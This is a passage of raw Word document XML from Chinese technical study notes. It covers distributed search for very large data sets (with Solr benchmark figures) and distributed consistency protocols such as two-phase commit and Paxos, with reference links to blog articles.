        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63790" w:rsidRPr="00F41A4C" w:rsidRDefault="00B63790" w:rsidP="00B63790">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00036169">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>答：使用分布式搜索引擎</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63790" w:rsidRPr="00F41A4C" w:rsidRDefault="00B63790" w:rsidP="00B63790">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据量过亿，无论是存储在关系型数据库还是非关系型数据库，使用非索引字段进行条件查询、模糊查询等复杂查询都是一件极其缓慢甚至是不可能完成的任务，数据库索引建立的是二级索引，大数据查询主要依靠搜索引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63790" w:rsidRPr="00F41A4C" w:rsidRDefault="00B63790" w:rsidP="00B63790">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:left="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>中国资料显示，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2400</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>亿每条数据大概</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>字节的数据建立索引，搭建分布式搜索引擎，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>台机器进行搜索测试，其中有条件查询、模糊查询等，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>80%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>的搜索能够在毫秒内返回结果，剩下一部分能够在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>秒内返回，还有</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5%</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>左右的查询需要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>50</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>秒左右的时间完成查询请求，客户端查询请求的并发量为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Adobe 仿宋 Std R" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>个客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B7C4E" w:rsidRPr="00F41A4C" w:rsidRDefault="004B7C4E" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="002B77AB" w:rsidP="00A368BE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.2 </w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式一致性算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A585E" w:rsidRPr="00F41A4C" w:rsidRDefault="004A585E" w:rsidP="004A585E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.2.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A585E" w:rsidRDefault="004A585E" w:rsidP="004A585E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>租约，复制协议，一致性协议。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A61F84" w:rsidRPr="00A61F84" w:rsidRDefault="00A61F84" w:rsidP="004A585E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A368BE" w:rsidRPr="00F41A4C" w:rsidRDefault="002B77AB" w:rsidP="00A368BE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.2.1 paxos</w:t>
      </w:r>
      <w:r w:rsidR="00A368BE" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B09B8" w:rsidRPr="00F41A4C" w:rsidRDefault="000B09B8" w:rsidP="004A413E">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Paxos</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是为了解决分布式环境下一致性的问题而提出的算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B09B8" w:rsidRPr="00F41A4C" w:rsidRDefault="000B09B8" w:rsidP="004A413E">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>http://www.open-open.com/lib/view/open1420635646984.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A702C" w:rsidRPr="00F41A4C" w:rsidRDefault="00DA54D7" w:rsidP="00F80DF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId289" w:history="1">
        <w:r w:rsidR="000B09B8" w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://blog.csdn.net/chen77716/article/details/6166675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005B1110" w:rsidRPr="005B1110" w:rsidRDefault="005B1110" w:rsidP="00034998">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两阶段提交协议：用于保证跨多个节点操作的原子性，也就是说，跨多个节点的操作要么都成功，要么都失败</w:t>
      </w:r>
      <w:r w:rsidR="00034998">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00034998">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00034998">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>axos</w:t>
      </w:r>
      <w:r w:rsidR="00034998">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>算法用于确保多个节点对某个投票（例如哪个节点为主节点）达成一致。</w:t>
      </w:r>
      <w:r w:rsidR="00AA4669">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Paxos</w:t>
      </w:r>
      <w:r w:rsidR="00AA4669">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>算法解决的什么问题呢，解决的就是保证每个节点执行相同的操作序列</w:t>
      </w:r>
      <w:r w:rsidR="00AA4669">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A702C" w:rsidRPr="00F41A4C" w:rsidRDefault="000A702C" w:rsidP="00232268">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>两个阶段确定一个决议：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A702C" w:rsidRPr="00F41A4C" w:rsidRDefault="000A702C" w:rsidP="004570F1">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phase1:</w:t>
      </w:r>
      <w:r w:rsidR="00464F7B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>确定谁的编号高，只有编号最高才有权利提出</w:t>
      </w:r>
      <w:r w:rsidR="00A13041" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pro</w:t>
      </w:r>
      <w:r w:rsidR="00464F7B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>posal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004570F1" w:rsidRPr="00F41A4C" w:rsidRDefault="000A702C" w:rsidP="00554038">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phase2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>编号最高的提交</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Proposol</w:t>
      </w:r>
      <w:r w:rsidR="00554038" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>如果没有其它节点提出更高</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>proposal</w:t>
      </w:r>
      <w:r w:rsidR="004570F1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，该提案通过；否则重来，异步通信不存在任何一致性算法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00554038" w:rsidRPr="00F41A4C" w:rsidRDefault="00554038" w:rsidP="00554038">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分布式系统中某个值</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>策略</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="001D727C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>达成一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005300EE" w:rsidRDefault="00554038" w:rsidP="005300EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>典型场景：分布式数据库系统中，各个节点的初始状态一致，每个节点都执行相同的操作序列，最后能得到一个一致的状态。</w:t>
      </w:r>
      <w:r w:rsidR="009A521D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>为保证执行相同的命令序列，需要在每一条指令上执行一个</w:t>
      </w:r>
      <w:r w:rsidR="009A521D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="009A521D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一致性算法</w:t>
      </w:r>
      <w:r w:rsidR="009A521D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="009A521D" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，以保证每个节点看到的指令是一致的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC714A" w:rsidRPr="005300EE" w:rsidRDefault="00BC714A" w:rsidP="005300EE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC714A" w:rsidRDefault="00BC714A" w:rsidP="00C96F4E">
      <w:bookmarkStart w:id="9" w:name="t11"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t>数据一致性与</w:t>
      </w:r>
      <w:r>
        <w:t>paxos</w:t>
      </w:r>
      <w:r>
        <w:t>算法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC714A" w:rsidRDefault="00BC714A" w:rsidP="00BC714A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
